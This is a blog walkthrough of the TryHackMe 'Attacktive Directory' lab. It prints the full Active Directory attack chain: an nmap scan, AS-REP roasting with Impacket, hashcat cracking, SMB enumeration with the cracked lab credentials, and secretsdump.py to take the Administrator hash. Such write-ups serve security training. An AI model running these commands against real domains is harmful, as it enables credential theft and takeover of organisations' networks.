TryHackme:Attacktive Directory Walkthrough

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Link:https://tryhackme.com/room/attacktivedirectory

This is free machine from THM which covers Active Directory. This room will also give you great hands on usage of Impacket tool. Let’s Begin.

First, let’s scan this target using nmap.

nmap -sC -sV <IP>

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-10-18 04:24:04Z) 

135/tcp open msrpc Microsoft Windows RPC 

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 

445/tcp open microsoft-ds? 

464/tcp open kpasswd5? 

593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 

3269/tcp open tcpwrapped 

3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | Product_Version: 10.0.17763 | System_Time: 2021-10-18T04:24:20+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-10-17T04:06:58
|_Not valid after: 2022-04-18T04:06:58
|_ssl-date: 2021-10-18T04:24:28+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-10-18T04:24:21
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.92 seconds

 

As we can see, plethora of ports is open including Kerberos. let’s use kerbrute to perform brute force. Before using this command make sure you have added your target IP to /etc/hosts with domain spookysec.local. Userlist and Passwordlist is already shared by creator.

 

To get the ASReproastable account from Key Distribution Centre,we will use GetNPUsers.py from Impacket.

python3 GetNPUsers.py -dc-ip spookysec.local spookysec.local/ -usersfile ~/THM/Attacktivedirec/user.txt -no-pass

Copy this hash and use hashcat to crack it.

hashcat -a 0 -m 18200 hash.txt passwordlist.txt --force

 

svc-admin: management2005 we will use this credential to check the shares on domain controller.

smbclient -L \\\\IP\\ -U 'svc-admin' -P 'management2005'

 

As we can see there is a backup share inside which contains base64 encode backup credentials.

 

As per Instruction of Creator:

Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes. Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.”

let’s use secretsdump.py

python3 secretsdump.py spookysec.local/backup:backup2517860@spookysec.local -just-dc-user Administrator

This output gave us Administrator credentials,Now we can use this to get admin access using winrm.

Root!!

Happy Hacking.

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top